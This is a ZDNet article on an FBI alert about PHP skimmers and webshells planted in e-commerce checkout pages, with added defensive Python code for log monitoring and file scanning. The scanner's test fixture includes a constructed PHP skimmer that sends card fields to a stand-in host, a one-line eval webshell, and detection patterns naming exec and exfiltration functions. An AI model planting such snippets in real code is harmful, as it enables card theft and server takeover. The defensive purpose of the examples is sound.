FBI: Hackers used malicious PHP code to grab credit card data – ZDNet

Unidentified attackers accessed credit card data and created a backdoor into the victim’s systems, says law enforcement agency.
Liam Tung is a full-time freelance technology journalist who writes for several Australian publications.
The Federal Bureau of Investigation (FBI) is warning that someone is scraping credit card data from the checkout pages of US businesses' websites.
“As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server,” the FBI said in an alert.
It said the “unidentified cyber actors” also established backdoor access to the victim’s system by modifying two files within the checkout page. 
JavaScript-based Magecart card-skimming attacks have been the main threat to e-commerce sites in recent years, but PHP code remains a major source of card skimming activity. 
According to the alert, the attackers began targeting US businesses in September 2020 by inserting malicious PHP code into customized online checkout pages. Earlier this year they changed tactics and switched to a different PHP function.
In that newer variant, the actors created a basic backdoor by using a debugging function that allowed the system to download two webshells onto the US firm's web server, giving the attackers persistent access for further exploitation.
The FBI's recommended mitigations include changing default login credentials on all systems, monitoring the requests made against your e-commerce environment to identify possible malicious activity, segregating and segmenting network systems to limit how easily criminals can move from one to another, and securing all websites that transfer sensitive information with TLS (the alert uses the older term "secure socket layer", or SSL, for the same protection).
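The alert's advice to monitor requests against the e-commerce environment is easier to act on with a concrete check. The following is an added example, not code from the FBI alert or from ZDNet: it parses web-server access logs in combined log format and flags the request patterns that typically accompany a dropped PHP webshell or a skimmer, namely POSTs to PHP files that are not known application entry points, PHP files being hit inside upload or cache directories, and direct requests for configuration files. The log lines, the allow-list of entry points and the directory names are constructed for this illustration.

```python
"""Added example (not from the FBI alert): request-log monitor for PHP
webshell and skimmer activity. Log lines and the allow-list are constructed."""
import re
from collections import Counter

# Constructed allow-list: PHP files that legitimately receive requests on this
# hypothetical shop. Any other .php path that receives a POST is suspect.
KNOWN_ENTRYPOINTS = {
    "/index.php",
    "/checkout/onepage.php",
    "/checkout/onepage/saveOrder.php",
}

# Directories that should hold static content only; a .php file there is a red flag.
UPLOAD_DIRS = ("/media/", "/pub/media/", "/var/", "/uploads/")

# Config files that must never be served directly.
CONFIG_FILES = ("env.php", "config.php", "wp-config.php", "local.xml")

# Combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: normal shop traffic plus one source poking a webshell
# under the media cache and probing a config file.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2022:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5123
203.0.113.7 - - [10/Mar/2022:10:01:09 +0000] "POST /checkout/onepage/saveOrder.php HTTP/1.1" 200 311
198.51.100.9 - - [10/Mar/2022:10:02:40 +0000] "POST /media/cache/.thumb.php HTTP/1.1" 200 42
198.51.100.9 - - [10/Mar/2022:10:02:41 +0000] "POST /media/cache/.thumb.php HTTP/1.1" 200 7780
198.51.100.9 - - [10/Mar/2022:10:03:05 +0000] "GET /app/etc/env.php HTTP/1.1" 403 199
203.0.113.8 - - [10/Mar/2022:10:04:00 +0000] "GET /checkout/onepage.php HTTP/1.1" 200 6001
"""


def parse(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def suspicious_requests(log_text):
    """Return (ip, method, path, status, reasons) for each request worth a look."""
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"]
        reasons = []
        if rec["method"] == "POST" and path.endswith(".php") and path not in KNOWN_ENTRYPOINTS:
            reasons.append("post-to-unknown-php")      # classic webshell interaction
        if path.endswith(".php") and path.startswith(UPLOAD_DIRS):
            reasons.append("php-in-upload-dir")        # executable code where only media belongs
        if path.endswith(CONFIG_FILES):
            reasons.append("config-file-access")       # credential harvesting attempt
        if reasons:
            hits.append((rec["ip"], rec["method"], path, int(rec["status"]), reasons))
    return hits


def top_sources(hits):
    """Rank source addresses by how many flagged requests they made."""
    return Counter(h[0] for h in hits).most_common()


if __name__ == "__main__":
    flagged = suspicious_requests(SAMPLE_LOG)
    for ip, method, path, status, reasons in flagged:
        print(f"{ip} {method} {path} -> {status} {', '.join(reasons)}")
    print("top sources:", top_sources(flagged))
```

The allow-list approach matters more than the pattern list: on a real deployment the entry points come from the application's own routing, and every POST to a PHP file outside that set deserves an explanation, regardless of what the file is called.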
Security firm Sucuri observed that 41% of the new credit card skimming malware samples it found in 2021 were PHP backend skimmers, which suggests that scanning only for frontend JavaScript infections misses a large proportion of card-skimming malware.
As Sucuri explains, webshell backdoors give attackers full access to the website's file system, often providing a complete picture of the environment, including the server operating system and PHP versions, as well as powerful functionality to change file permissions and move into adjacent websites and directories. Webshells accounted for 19% of the 400 new malware signatures Sucuri gathered in 2021. The firm saw a "hugely disproportionate" rise in 2021 signatures for PHP-based credit card stealers affecting the e-commerce platforms Magento, WordPress and OpenCart.
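Both findings above, the two modified checkout files plus dropped webshells in the FBI case and Sucuri's point that frontend JavaScript scanning misses backend PHP skimmers, come down to the same practical question: which PHP files on the server changed, and do they now read card data or execute attacker input? The following is an added example, not code from the FBI alert, ZDNet or Sucuri. It compares a known-good hash baseline of the webroot against the live tree and runs a heuristic source scan over every PHP file, looking for the combination of card-field reads with an outbound channel (skimmer), execution of request data (webshell) and decoding layers (obfuscation). The file tree, the injected snippets and the indicator patterns are constructed for this illustration and are not FBI indicators of compromise; the example goes beyond the alert's case by scanning the whole tree rather than only the checkout files.

```python
"""Added example (not from the FBI alert or the article): file-integrity check
plus heuristic PHP source scan. All files and patterns below are constructed."""
import hashlib
import re

# Constructed snapshot of a known-good webroot: path -> source text.
BASELINE = {
    "index.php": "<?php\nrequire 'app/bootstrap.php';\n",
    "checkout/onepage.php": (
        "<?php\n// legitimate checkout controller\n"
        "$order = load_order((int) $_GET['id']);\nrender($order);\n"
    ),
    "app/payment/Authorize.php": (
        "<?php\nfunction charge(array $card) {\n"
        "    return gateway_post('https://gateway.example/charge', $card);\n}\n"
    ),
}

# The same webroot after a hypothetical compromise: the checkout file gains a
# skimmer that reads card fields from the POST body and posts them to a
# look-alike host, and a webshell is dropped under a cache directory.
# The base64 literal decodes to https://x.example, a stand-in for the
# spoofed processor host.
COMPROMISED = dict(BASELINE)
COMPROMISED["checkout/onepage.php"] = BASELINE["checkout/onepage.php"] + (
    "\n$u = base64_decode('aHR0cHM6Ly94LmV4YW1wbGU=');\n"
    "$p = $_POST['cc_number'] . '|' . $_POST['cc_cvv'] . '|' . $_POST['cc_exp'];\n"
    "$ch = curl_init($u);\ncurl_setopt($ch, CURLOPT_POSTFIELDS, $p);\ncurl_exec($ch);\n"
)
COMPROMISED["media/cache/.thumb.php"] = (
    "<?php if (isset($_REQUEST['x'])) { eval(base64_decode($_REQUEST['x'])); }\n"
)

# Indicator patterns (assumptions for this example, tune for the real code base).
CARD_FIELD = re.compile(r"\$_(?:POST|REQUEST)\[\s*[\'\"](?:cc_|card|cvv|cvc|exp)", re.I)
EXFIL = re.compile(r"\b(?:curl_init|curl_exec|fsockopen|stream_socket_client|mail)\s*\(", re.I)
OBFUSCATION = re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
REMOTE_EXEC = re.compile(
    r"\b(?:eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\s*\(.*"
    r"\$_(?:GET|POST|REQUEST|COOKIE)",
    re.I,
)


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def integrity_diff(baseline, current):
    """Compare a known-good hash baseline against the live tree.
    Returns (modified, added, removed) as sorted path lists."""
    base = {p: sha256(s) for p, s in baseline.items()}
    live = {p: sha256(s) for p, s in current.items()}
    modified = sorted(p for p in base if p in live and base[p] != live[p])
    added = sorted(p for p in live if p not in base)
    removed = sorted(p for p in base if p not in live)
    return modified, added, removed


def scan_php(source):
    """Heuristic findings for one PHP file, in the order they are checked."""
    findings = []
    if CARD_FIELD.search(source) and EXFIL.search(source):
        findings.append("card-data-exfil")  # reads card fields and opens an outbound channel
    if REMOTE_EXEC.search(source):
        findings.append("webshell")         # executes attacker-supplied request data
    if OBFUSCATION.search(source):
        findings.append("obfuscation")      # decoding layers that hide the payload
    return findings


def audit(baseline, current):
    """Integrity changes plus content findings. Every live file is scanned, not
    only changed ones, because the baseline itself may postdate the compromise."""
    modified, added, removed = integrity_diff(baseline, current)
    findings = {p: f for p, f in ((p, scan_php(s)) for p, s in current.items()) if f}
    return {"modified": modified, "added": added, "removed": removed, "findings": findings}


if __name__ == "__main__":
    for key, value in audit(BASELINE, COMPROMISED).items():
        print(f"{key}: {value}")
```

On a real server the baseline comes from a clean deployment artifact (the package checksums or the git tree), not from the live host, and the scan is run over the files on disk; the in-memory dictionaries here only stand in for that so the example runs offline.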
© 2022 ZDNET, A RED VENTURES COMPANY. ALL RIGHTS RESERVED.